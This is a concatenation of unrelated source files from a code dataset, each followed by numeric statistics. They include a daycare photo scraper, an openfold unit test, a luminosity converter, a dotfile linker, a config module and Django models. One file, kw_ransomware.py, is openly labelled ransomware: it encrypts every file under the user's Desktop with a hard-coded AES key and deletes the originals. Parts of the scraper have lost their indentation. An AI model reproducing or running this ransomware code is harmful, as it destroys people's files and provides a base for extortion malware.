            year = self.find_by_xpath(year_xpath, "any more years")
            self.__current_month__ = month
            self.__current_year__ = year
            yield month
            month_index += 1
    def iter_urls(self):
        '''Yield Image and Report objects for every item on every month page.

        Walks each month tile, and within it each child's timeline. Media
        divs are buffered until the following report tile supplies their
        date; the buffered images are then dated and yielded, followed by
        the report itself. Trailing media with no report are yielded undated.
        '''
        if self.download_reports:
            # Click the "All" button, so reports are included in our iterator
            self.sleep(1, 3) # Ensure page is loaded
            self.logger.info("Clicking 'All' button to load reports")
            all_btn = self.find_by_xpath('//*[@id="app"]/div[3]/div[2]/div[1]/div[2]/ul/li[1]', "'All' button on the Timeline")
            all_btn.click()
        # For each month on the dashboard...
        for month in self.iter_monthyear():
            # Navigate to the next month.
            month.click()
            self.logger.info("Getting urls for month: %s", month.text)
            self.sleep(minsleep=5, maxsleep=7)
            # For each child...
            for child in range(self.get_num_children()):
                # Click on child if needed
                if(self.get_num_children() > 1):
                    self.logger.info("Clicking on %s's page", self.get_child_name())
                    #0 ->2nd li, 1->3rd li, etc.
                    cur_child_xpath = '//*[@id="app"]/div[2]/div[3]/ul/li[%s]/li/div' % str(self.current_child_ind+2)
                    current_child = self.find_by_xpath(cur_child_xpath, "link to %s's page" % self.get_child_name())
                    # click events are only activated on mouseover
                    chain = ActionChains(self.browser).move_to_element_with_offset(current_child, 5, 5).click()
                    chain.perform()
                # Bools to correctly identify reports and images
                report = lambda div: (not Image.url_search(div)) and ('report' in div.get_attribute('outerText'))
                image = lambda div: Image.url_search(div) and ('thumbnail' in Image.url_search(div).group(1))
                elements = self.browser.find_elements_by_xpath('//div[@class="well left-panel pull-left"]/ul/li/div')
                # Collect media files until we see a report
                # Once we see a report, apply that date to all seen media files
                # Yield processed media files, and then the report
                # Deal with edge case where no report is found
                media_buffer = []
                for div in elements:
                    if image(div):
                        img = Image(div=div)
                        media_buffer.append(img)
                    elif report(div):
                        _report = Report(div=div)
                        # Apply date to all elements in buffer
                        date_text = _report.date_text
                        for img in media_buffer:
                            img.date = int(date_text)
                        # For each image/video, pop from buffer and yield
                        while len(media_buffer) > 0:
                            yield media_buffer.pop()
                        # Once images are processed, yield report div
                        yield _report
                # Handle edge case where there are media files but no report
                while len(media_buffer) > 0:
                    yield media_buffer.pop()
                # Goto next child, if possible
                self.next_child()
    def save_report(self, report):
        '''Save a daily report's HTML to download/<child>/<year>/<month>/.

        Clicks the report tile to open its modal, extracts the modal HTML,
        closes the pop-up, and writes the content wrapped in <html> tags.
        Skips reports that have already been downloaded.
        '''
        # Make file name
        child_text = self.get_child_name().lower()
        year_text = self.__current_year__.text
        month_text = self.month_lookup[self.__current_month__.text]
        date_text = report.date_text
        filename_parts = ['download', child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}.{}']
        filename_report = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, 'html'))
        # Only download if the file doesn't already exist.
        if isfile(filename_report):
            self.logger.info("Already downloaded report: %s", filename_report)
            return
        # Make sure the parent dir exists.
        directory = dirname(filename_report)
        if not isdir(directory):
            os.makedirs(directory)
        self.logger.info("Downloading report: %s", filename_report)
        div = report.div
        # Click on div to open the report modal
        div.click()
        self.sleep(1, 2) # Wait to load
        # Extract body
        body = self.browser.find_element_by_class_name('modal-overflow-wrapper')
        text = body.get_attribute('innerHTML')
        # Close pop-up
        x = self.find_by_xpath('//*[@id="dr-modal-printable"]/div[1]/i', 'Close Popup Button')
        x.click()
        # Wait to load
        self.sleep(1, 2)
        with open(filename_report, 'w', encoding='UTF-8') as report_file:
            self.logger.info("Saving: %s", filename_report)
            report_file.write("<html>")
            report_file.write(text)
            report_file.write("</html>")
        self.logger.info("Finished saving: %s", filename_report)
    def save_image(self, img):
        '''Download a media item (jpg/png/mp4) via requests and save it locally.

        The extension is decided by the response's content-type; downloads
        are skipped when any of the three candidate filenames already exist,
        and retried up to max_retries times on non-200 responses.
        '''
        url = img.url
        date_text = img.date_text
        _id = img.id
        # NOTE(review): `key` is never used below - confirm whether it was
        # meant to be part of the filename or the request.
        key = img.key
        year_text = self.__current_year__.text
        month_text = self.month_lookup[self.__current_month__.text]
        child_text = self.get_child_name().lower()
        default_download_dir = self.config_requests_info()['default_download_dir']
        # Make the local filename.
        filename_parts = [default_download_dir, child_text, year_text, month_text, 'tadpoles-{}-{}-{}-{}-{}.{}']
        filename_jpg = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'jpg'))
        # we might even get a png file even though the mime type is jpeg.
        filename_png = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'png'))
        # We don't know if we have a video or image yet so create both name
        filename_video = abspath(join(*filename_parts).format(child_text, year_text, month_text, date_text, _id, 'mp4'))
        # Only download if the file doesn't already exist.
        if isfile(filename_jpg):
            self.logger.info("Already downloaded image: %s", filename_jpg)
            return
        if isfile(filename_video):
            self.logger.info("Already downloaded video: %s", filename_video)
            return
        if isfile(filename_png):
            self.logger.info("Already downloaded png file: %s", filename_png)
            return
        self.logger.info("Downloading from: %s", url)
        # Make sure the parent dir exists.
        directory = dirname(filename_jpg)
        if not isdir(directory):
            os.makedirs(directory)
        # Sleep to avoid bombarding the server
        self.sleep(1, 3)
        # Download it with requests.
        max_retries = int(self.config_requests_info()['max_retries'])
        retries = 0
        while retries < max_retries:
            resp = requests.get(url, cookies=self.req_cookies, stream=True)
            if resp.status_code == 200:
                file = None
                try:
                    content_type = resp.headers['content-type']
                    self.logger.info("Content Type: %s.", content_type)
                    if content_type == 'image/jpeg':
                        filename = filename_jpg
                    elif content_type == 'image/png':
                        filename = filename_png
                    elif content_type == 'video/mp4':
                        filename = filename_video
                    else:
                        self.logger.warning("Unsupported content type: %s", content_type)
                        return
                    # Stream to disk in 1 KiB chunks; the file is opened
                    # lazily on the first chunk.
                    for chunk in resp.iter_content(1024):
                        if file is None:
                            self.logger.info("Saving: %s", filename)
                            file = open(filename, 'wb')
                        file.write(chunk)
                    self.logger.info("Finished saving %s", filename)
                finally:
                    if file is not None:
                        file.close()
                break
            else:
                msg = 'Error downloading %r. Retrying. Response:'+str(resp)
                retries += 1
                self.logger.warning(msg, url)
                self.sleep(1, 5)
    def download_images(self):
        '''Login to tadpoles.com and download all user's images and reports.
        '''
        self.navigate_url(self.ROOT_URL)
        self.do_login()
        self.dump_cookies()
        self.add_cookies_to_browser()
        self.requestify_cookies()
        # Get application parameters (account/children metadata) from the page
        self.app_params = self.browser.execute_script("return tadpoles.appParams")
        self.logger.info("Loaded Tadpoles parameters")
        # start off with child 0 (if more than one exists)
        self.current_child_ind = 0
        for response in self.iter_urls():
            try:
                if isinstance(response, Image):
                    self.save_image(response)
                elif isinstance(response, Report):
                    self.save_report(response)
            except DownloadError:
                self.logger.exception("Error while saving resource")
            except (KeyboardInterrupt):
                # NOTE(review): catching KeyboardInterrupt inside the loop
                # means Ctrl-C skips only the current item and the download
                # continues - confirm whether a full stop was intended.
                self.logger.info("Download interrupted by user")
def find_by_xpath(self, selector, name='element', form=None):
'''Find element by xpath, but catch NoSuchElementException to log which XPath is faulty
'''
if form==None:
form = self.browser
try:
el = form.find_element_by_xpath(selector)
except NoSuchElementException:
self.logger.info("Could not find %s using XPath %s. Stopping.", name, selector)
sys.exit(0)
return el
def create_config_file(file_name):
    """Write a fresh settings file with blank credentials and default download options.

    Used on first run or to reset the configuration; the user is told to
    fill in their credentials before re-running the script.
    """
    cfg = ConfigParser()
    cfg['AUTHENTICATION'] = {'username': '', 'password': ''}
    cfg['DOWNLOADS'] = {'max_retries': '5', 'default_download_dir': 'download'}
    with open(file_name, 'w') as cfg_file:
        cfg.write(cfg_file)
    print("New configuration file generated!\n")
    print("Please edit 'settings.ini' and input your authentication information before continuing to use this script.\n")
def read_config_file(file_name):
    """Parse and return an already existing INI settings file.

    Assumes the expected sections/keys are present; no validation is done.
    """
    parser = ConfigParser()
    parser.read(file_name)
    return parser
if __name__ == "__main__":
settings = 'settings.ini'
config = None
if isfile(settings):
config = read_config_file(settings)
else:
create_config_file(settings)
input("Press any key to exit.")
exit()
with Client(config) as client:
client.download_images()
| 39.272553 | 129 | 0.589903 | 2,490 | 20,461 | 4.673494 | 0.198795 | 0.030076 | 0.037295 | 0.010312 | 0.197817 | 0.137492 | 0.114978 | 0.073215 | 0.059466 | 0.044169 | 0 | 0.006702 | 0.299936 | 20,461 | 520 | 130 | 39.348077 | 0.805711 | 0.142417 | 0 | 0.116531 | 0 | 0.00813 | 0.143892 | 0.021854 | 0 | 0 | 0 | 0.001923 | 0 | 1 | 0.084011 | false | 0.01626 | 0.04336 | 0.01626 | 0.208672 | 0.00813 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4137ed760291cec3e1fabbc437a8f67ebd69c0e3 | 1,598 | py | Python | tests/test_primitives.py | empyriumz/openfold | 12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32 | [
"Apache-2.0"
] | 789 | 2021-11-12T16:12:21.000Z | 2022-03-28T05:45:19.000Z | tests/test_primitives.py | empyriumz/openfold | 12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32 | [
"Apache-2.0"
] | 84 | 2021-11-12T22:23:50.000Z | 2022-03-29T01:06:06.000Z | tests/test_primitives.py | empyriumz/openfold | 12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32 | [
"Apache-2.0"
] | 114 | 2021-11-12T16:00:57.000Z | 2022-03-27T21:32:31.000Z | # Copyright 2021 AlQuraishi Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import unittest
from openfold.model.primitives import (
Attention,
)
from tests.config import consts
class TestLMA(unittest.TestCase):
    """Tests for the low-memory attention (LMA) code path."""
    def test_lma_vs_attention(self):
        # Compare LMA output against the standard attention path on random
        # inputs; they must agree to within consts.eps.
        batch_size = consts.batch_size
        c_hidden = 32
        n = 2**12
        no_heads = 4
        q = torch.rand(batch_size, n, c_hidden).cuda()
        kv = torch.rand(batch_size, n, c_hidden).cuda()
        bias = [torch.rand(no_heads, 1, n)]
        bias = [b.cuda() for b in bias]
        # NOTE(review): gating_fill and o_fill are never used below - confirm
        # whether they were meant to initialise the attention weights.
        gating_fill = torch.rand(c_hidden * no_heads, c_hidden)
        o_fill = torch.rand(c_hidden, c_hidden * no_heads)
        a = Attention(
            c_hidden, c_hidden, c_hidden, c_hidden, no_heads
        ).cuda()
        # Inference only; gradients are irrelevant to the equivalence check.
        with torch.no_grad():
            l = a(q, kv, biases=bias, use_lma=True)
            real = a(q, kv, biases=bias)
        self.assertTrue(torch.max(torch.abs(l - real)) < consts.eps)
if __name__ == "__main__":
unittest.main()
| 29.592593 | 74 | 0.652691 | 232 | 1,598 | 4.344828 | 0.5 | 0.076389 | 0.031746 | 0.055556 | 0.175595 | 0.115079 | 0.059524 | 0.059524 | 0 | 0 | 0 | 0.012584 | 0.254068 | 1,598 | 53 | 75 | 30.150943 | 0.833054 | 0.349812 | 0 | 0 | 0 | 0 | 0.007805 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 1 | 0.035714 | false | 0 | 0.178571 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4138a7bccc894c41843ad8dd0583587c67038959 | 1,466 | py | Python | python/Lumniosity_Converter.py | pbrown801/aggienova-templates | 24f1269bf26ab8026a27df87358f80ea8ad04933 | [
"MIT"
] | 2 | 2019-09-23T18:42:12.000Z | 2019-09-30T04:17:10.000Z | python/Lumniosity_Converter.py | pbrown801/aggienova-templates | 24f1269bf26ab8026a27df87358f80ea8ad04933 | [
"MIT"
] | 12 | 2019-02-20T18:38:25.000Z | 2022-03-13T02:32:57.000Z | python/Lumniosity_Converter.py | pbrown801/aggienova-templates | 24f1269bf26ab8026a27df87358f80ea8ad04933 | [
"MIT"
] | 1 | 2020-01-14T17:26:33.000Z | 2020-01-14T17:26:33.000Z | import pandas as pd
import numpy as np
import math
from dust_extinction.parameter_averages import F19
def extinction_adjustment(rv):
    """Evaluate the F19 dust-extinction curve at the template wavelengths.

    Parameters
    ----------
    rv : float
        Total-to-selective extinction ratio R(V) for the F19 model.

    Returns
    -------
    pandas.Series
        One extinction value per row of the module-level ``sn_templ``
        'Wavelength' column.
    """
    # Convert wavelength (Angstrom) to wavenumber (1/micron): 1 / (A / 10000).
    # (The previous unused `len_wave` local has been removed.)
    wavenum_waves = [1/(a/10000) for a in sn_templ['Wavelength']]
    ext_model = F19(Rv=rv)
    return(pd.Series(ext_model(wavenum_waves)))
def Dm_to_Lum(sn_name):
    """Convert template fluxes to luminosities via the SN's distance modulus.

    Looks up *sn_name* in the module-level ``swift`` table to obtain its
    corrected distance modulus, scales each flux in ``sn_templ`` by the
    spherical surface area at that distance, and divides out Milky Way
    extinction (F19, Rv=3.1). Returns a DataFrame with MJD, Wavelength and
    Luminosity columns.
    """
    def Grab_Lum(Dist_mod, Flux):
        # Parsec in centimetres.
        P_cm= 3.08567758128*10**(18)
        # Luminosity distance from the distance modulus: d = 10^(mu/5 + 1) pc.
        D_cm= 10**((Dist_mod/5)+1)*P_cm
        # Surface area of the sphere at that distance.
        S_a= 4*np.pi*D_cm**2
        lum= Flux*S_a
        return lum
    # Find the (first) row mentioning this supernova in any column.
    idex= swift.loc[swift.isin([sn_name]).any(axis=1)].index.tolist()
    idex=idex[0]
    Dist_mod= swift['Dist_mod_cor'][idex]
    Lum= pd.Series(sn_templ.apply(lambda row: Grab_Lum(Dist_mod=Dist_mod, Flux= row['Flux']), axis=1))
    # Correct for Galactic extinction along the line of sight.
    Lum=Lum/extinction_adjustment(3.1)
    Lum=pd.DataFrame({'MJD': sn_templ['MJD'], 'Wavelength': sn_templ['Wavelength'], 'Luminosity': Lum.tolist()})
    return Lum
def Lum_conv(sn_name, output_file, swift_path='../input/NewSwiftSNweblist.csv'):
    """Convert a flux template file into luminosities for a supernova.

    :param sn_name: string name of the supernova (may include '_uvot' suffix)
    :param output_file: string path to the template CSV with a 'Flux' column
    :param swift_path: [optional] string path to the Swift SN weblist CSV
        (parameterized so callers are no longer tied to the hard-coded path)
    :return: pandas DataFrame with MJD, Wavelength and Luminosity columns
    """
    # Dm_to_Lum and extinction_adjustment read these module-level globals
    global swift
    swift = pd.read_csv(swift_path)
    global sn_templ
    '''Input desired template file name with Flux'''
    sn_templ = pd.read_csv(output_file)
    # the weblist keys off the bare supernova name, without '_uvot'
    sn_name = sn_name.replace("_uvot", "")
    '''Input name of supernovae'''
    lum_templ = Dm_to_Lum(sn_name)
    return lum_templ
if __name__ == "__main__":
    # example invocation for manually exercising the conversion pipeline
    l=Lum_conv('SN2005cs_uvot','../output/TEMPLATE/SN2005cs_uvot_SNIa_series_template.csv')
    # print(type(l))
    # extinction_adjustment(3.1)
413b8b891d2f44221bdddfd4cafbe2d545ac748d | 4,076 | py | Python | bin/dotty.py | jgrip/dotfiles | 78e96c3eaa1bb64d9197b23115bb1f144d4ca184 | [
"Unlicense"
] | null | null | null | bin/dotty.py | jgrip/dotfiles | 78e96c3eaa1bb64d9197b23115bb1f144d4ca184 | [
"Unlicense"
] | null | null | null | bin/dotty.py | jgrip/dotfiles | 78e96c3eaa1bb64d9197b23115bb1f144d4ca184 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
from __future__ import print_function
# Copyright (C) 2015 Vibhav Pant <vibhavp@gmail.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import json
import os
import shutil
from sys import stderr
import argparse
# Fix Python 2.x.
try: input = raw_input  # Python 2: alias raw_input so input() never evals
except NameError: pass  # Python 3: raw_input is gone; builtin input is safe
def ask_user(prompt):
    """Ask a yes/no question until the user gives a recognized answer.

    Returns True for "yes"/"y"/empty input, False for "no"/"n".
    """
    answers = {"yes": True, "y": True, "": True, "no": False, "n": False}
    while True:
        print("{0} ".format(prompt), end="")
        reply = input().lower()
        if reply not in answers:
            print("Enter a correct choice.", file=stderr)
            continue
        return answers[reply]
def create_directory(path):
    """Expand ~ in *path* and create the directory tree if it is missing."""
    target = os.path.expanduser(path)
    if os.path.isdir(target):
        return
    print("{0} doesnt exist, creating.".format(target))
    os.makedirs(target)
def create_symlink(src, dest, replace):
    """Create a symlink dest -> src, optionally replacing an existing dest.

    An existing identical link is skipped; anything else at dest is removed
    when *replace* is True or the user confirms. On Pythons whose os module
    lacks symlink (raises AttributeError), falls back to the Win32
    CreateSymbolicLinkW API via ctypes.
    """
    dest = os.path.expanduser(dest)
    src = os.path.abspath(src)
    # a path that lexists but does not exist is a dangling symlink
    broken_symlink = os.path.lexists(dest) and not os.path.exists(dest)
    if os.path.lexists(dest):
        if os.path.islink(dest) and os.readlink(dest) == src:
            print("Skipping existing {0} -> {1}".format(dest, src))
            return
        elif replace or ask_user("{0} exists, delete it? [Y/n]".format(dest)):
            # files, links and dangling links use remove; real dirs need rmtree
            if os.path.isfile(dest) or broken_symlink or os.path.islink(dest):
                os.remove(dest)
            else:
                shutil.rmtree(dest)
        else:
            return
    print("Linking {0} -> {1}".format(dest, src))
    try:
        os.symlink(src, dest)
    except AttributeError:
        # Windows fallback: call the kernel32 API directly
        import ctypes
        symlink = ctypes.windll.kernel32.CreateSymbolicLinkW
        symlink.argtypes = (ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
        symlink.restype = ctypes.c_ubyte
        # flag 1 marks a directory symlink
        flags = 1 if os.path.isdir(src) else 0
        symlink(dest, src, flags)
def copy_path(src, dest):
    """Copy a file or directory *src* to *dest*, asking before overwriting.

    An existing destination is removed only when the user agrees; otherwise
    the copy is skipped entirely.
    """
    dest = os.path.expanduser(dest)
    src = os.path.abspath(src)
    if os.path.exists(dest):
        if not ask_user("{0} exists, delete it? [Y/n]".format(dest)):
            return
        if os.path.isfile(dest) or os.path.islink(dest):
            os.remove(dest)
        else:
            shutil.rmtree(dest)
    print("Copying {0} -> {1}".format(src, dest))
    copier = shutil.copy if os.path.isfile(src) else shutil.copytree
    copier(src, dest)
def run_command(command):
    """Echo *command* and execute it through the system shell."""
    print("Running {0}".format(command))
    os.system(command)
def main():
    """Parse CLI args, load the JSON config and apply its sections in order.

    Recognized config keys: directories, link, copy, install + install_cmd,
    commands.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("config", help="the JSON file you want to use")
    parser.add_argument("-r", "--replace", action="store_true",
                        help="replace files/folders if they already exist")
    args = parser.parse_args()
    js = json.load(open(args.config))
    # resolve relative paths in the config against the config file's directory
    os.chdir(os.path.expanduser(os.path.abspath(os.path.dirname(args.config))))
    if 'directories' in js: [create_directory(path) for path in js['directories']]
    if 'link' in js: [create_symlink(src, dst, args.replace) for src, dst in js['link'].items()]
    if 'copy' in js: [copy_path(src, dst) for src, dst in js['copy'].items()]
    if 'install' in js and 'install_cmd' in js:
        packages = ' '.join(js['install'])
        run_command("{0} {1}".format(js['install_cmd'], packages))
    if 'commands' in js: [run_command(command) for command in js['commands']]
    print("Done!")
if __name__ == "__main__":
    # script entry point
    main()
| 34.837607 | 96 | 0.639352 | 581 | 4,076 | 4.416523 | 0.359725 | 0.046765 | 0.021824 | 0.023383 | 0.213172 | 0.160171 | 0.125487 | 0.125487 | 0.125487 | 0.125487 | 0 | 0.011832 | 0.232826 | 4,076 | 116 | 97 | 35.137931 | 0.808762 | 0.187929 | 0 | 0.202381 | 0 | 0 | 0.121966 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0.011905 | 0.083333 | 0 | 0.202381 | 0.107143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413c30019b7152204c51cd4030495eeb971c8934 | 2,472 | py | Python | sltxpkg/config.py | EagleoutIce/sltx-inst | cb45346177c22fd5bf47f29cebf34f09f16b9a4b | [
"MIT"
] | null | null | null | sltxpkg/config.py | EagleoutIce/sltx-inst | cb45346177c22fd5bf47f29cebf34f09f16b9a4b | [
"MIT"
] | null | null | null | sltxpkg/config.py | EagleoutIce/sltx-inst | cb45346177c22fd5bf47f29cebf34f09f16b9a4b | [
"MIT"
] | null | null | null | import os
import sys
from pathlib import Path
from sltxpkg import globals as sg
from sltxpkg import util as su
from sltxpkg.globals import (C_CACHE_DIR, C_CREATE_DIRS, C_DOWNLOAD_DIR, C_DRIVER_LOG,
C_TEX_HOME, C_WORKING_DIR)
from sltxpkg.log_control import LOGGER
from sltxpkg.types import SltxDependencies
def write_to_log(data: str):
    """Append *data* to the configured driver log, ensuring a trailing newline.

    Does nothing when the configured log path is empty or whitespace-only.
    """
    log_path = sg.configuration[C_DRIVER_LOG]
    if not log_path.strip():
        return
    with open(log_path, 'a') as log_file:
        log_file.write(data if data.endswith('\n') else data + '\n')
def load_configuration(file: str):
    """Merge the yaml configuration in *file* into the global sltx config.

    Args:
        file (str): The configuration file to load
    """
    loaded = su.load_yaml(file)
    sg.configuration = {**sg.configuration, **loaded}
def expand_url(path: str, cwd: Path) -> str:
    """Format a url template, substituting {cwd} with the parent of *cwd*.

    Returns an empty string when *path* is None.
    """
    if path is None:
        return ""
    return path.format(cwd=str(cwd.parent))
def load_dependencies_config(file: str, target: dict) -> SltxDependencies:
    """Load a dependency yaml file and merge it on top of *target*.

    Any 'url' entry inside the dependencies is expanded relative to the
    absolute location of *file* before merging.

    Args:
        file (str): The file to load
        target (dict): The target dependency-collection to append it to (won't be modified)

    Returns:
        dict: The target dict with the added dependencies
    """
    loaded = su.load_yaml(file)
    if 'dependencies' in loaded:
        anchor = Path(file).absolute()
        for dep_data in loaded['dependencies'].values():
            if 'url' in dep_data:
                dep_data['url'] = expand_url(dep_data['url'], anchor)
    return {**target, **loaded}
def assure_dir(name: str, target_path: str, create: bool):
    """Ensure *target_path* exists, creating it when allowed.

    Exits the program with status 1 when the directory is missing and
    *create* is False.
    """
    if os.path.isdir(target_path):
        return
    if not create:
        LOGGER.error("! Not allowed to create " + name + ". Exit")
        sys.exit(1)
    LOGGER.info("> %s: %s not found. Creating...", name, target_path)
    os.makedirs(target_path)
def assure_dirs():
    """Expand and create every directory the sltx configuration points at.

    Resolves the tex home plus the working, download and cache directories,
    honoring the C_CREATE_DIRS flag for whether missing dirs may be created.
    """
    sg.configuration[C_TEX_HOME] = su.get_sltx_tex_home()  # expansion
    create = sg.configuration[C_CREATE_DIRS]
    assure_dir('Tex-Home', sg.configuration[C_TEX_HOME], create)
    for config, name in [(C_WORKING_DIR, 'Working-Dir'), (C_DOWNLOAD_DIR, 'Download-Dir'),
                         (C_CACHE_DIR, 'Cache-Dir')]:
        sg.configuration[config] = os.path.expanduser(
            sg.configuration[config])  # expansion
        assure_dir(name, sg.configuration[config], create)
| 32.96 | 91 | 0.636327 | 342 | 2,472 | 4.423977 | 0.280702 | 0.099141 | 0.052875 | 0.029081 | 0.06345 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00054 | 0.250809 | 2,472 | 74 | 92 | 33.405405 | 0.816415 | 0.147654 | 0 | 0 | 0 | 0 | 0.073408 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.173913 | 0.021739 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413c68cef2a9cdf443fb29e050740dc6fceb6953 | 2,896 | py | Python | kw_ransomware.py | CodmingOut/SecretProjectAI | addc43117eab30a25453c18fa042739c33cc6cfb | [
"MIT"
] | null | null | null | kw_ransomware.py | CodmingOut/SecretProjectAI | addc43117eab30a25453c18fa042739c33cc6cfb | [
"MIT"
] | null | null | null | kw_ransomware.py | CodmingOut/SecretProjectAI | addc43117eab30a25453c18fa042739c33cc6cfb | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 24 21:32:11 2020
@author: kw
"""
import glob
import os, random, struct
import getpass
from Cryptodome.Cipher import AES
class makeMyRansomware:
def __init__(self, your_extension=".Example", key=b'keyfor16bytes123', username=getpass.getuser()):
self.your_extension = your_extension
self.key = key
self.username = username
def encrypt_file(self, key, in_filename, out_filename=None, chunksize=64*1024):
if not out_filename:
out_filename = in_filename + self.your_extension
iv = os.urandom(16)
encryptor = AES.new(key ,AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
def decrypt_file(self, key, in_filename, out_filename=None, chunksize=24*1024):
if not out_filename:
out_filename = os.path.splitext(in_filename)[0]
with open(in_filename, 'rb') as infile:
origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
iv = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, iv)
with open(out_filename, 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
outfile.write(decryptor.decrypt(chunk))
outfile.truncate(origsize)
def Encryptor(self, startPath):
for filename in glob.iglob(startPath, recursive=True):
if(os.path.isfile(filename)):
print('Encrypting> ' + filename)
self.encrypt_file(self.key, filename)
os.remove(filename)
def Decryptor(self, startPath):
for filename in glob.iglob(startPath, recursive=True):
if(os.path.isfile(filename)):
fname, ext = os.path.splitext(filename)
if (ext == self.your_extension):
print('Decrypting> ' + filename)
self.decrypt_file(self.key, filename)
os.remove(filename)
if __name__ == "__main__":
import time
Ransom1 = makeMyRansomware(".Hello")
startpath = 'c:/Users/'+Ransom1.username+'/Desktop/**'
#You can encrypt or decrypt like this
Ransom1.Encryptor(startpath)
Ransom1.Decryptor(startpath) | 33.287356 | 103 | 0.564917 | 324 | 2,896 | 4.932099 | 0.342593 | 0.055069 | 0.042553 | 0.022528 | 0.397998 | 0.397998 | 0.397998 | 0.216521 | 0.216521 | 0.1602 | 0 | 0.02551 | 0.323204 | 2,896 | 87 | 104 | 33.287356 | 0.789796 | 0.044199 | 0 | 0.333333 | 0 | 0 | 0.034795 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.033333 | 0.083333 | 0 | 0.183333 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413c7bf5865a56e3f581e75a1fa2f6a01c3109a4 | 4,756 | py | Python | hospital/models.py | mohitkyadav/calldoc | ebdcdcfac346e995c44cbf94a3c87c25ba594ee1 | [
"MIT"
] | 9 | 2019-05-19T14:00:03.000Z | 2019-05-21T14:19:56.000Z | hospital/models.py | mohitkyadav/calldoc | ebdcdcfac346e995c44cbf94a3c87c25ba594ee1 | [
"MIT"
] | 8 | 2019-05-20T12:29:08.000Z | 2022-02-10T11:06:55.000Z | hospital/models.py | mohitkyadav/calldoc | ebdcdcfac346e995c44cbf94a3c87c25ba594ee1 | [
"MIT"
] | 1 | 2019-05-20T07:04:20.000Z | 2019-05-20T07:04:20.000Z | import uuid
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator
from landing.models import Profile
class Specialisation(models.Model):
    # a named medical specialisation, referenced by hospitals and doctors

    class Meta:
        ordering = ('id',)
        verbose_name = 'specialisation'
        verbose_name_plural = 'specialisations'

    # uuid4 primary key stored as a non-editable text field
    id = models.CharField(unique=True, default=uuid.uuid4,
                          editable=False, max_length=50, primary_key=True)
    name = models.CharField(max_length=50)

    def __str__(self):
        return self.name
class Hospital(models.Model):
    # hospital account profile tied one-to-one to an auth User

    class Meta:
        ordering = ('-rating',)
        verbose_name = 'Hospital'
        verbose_name_plural = 'Hospitals'

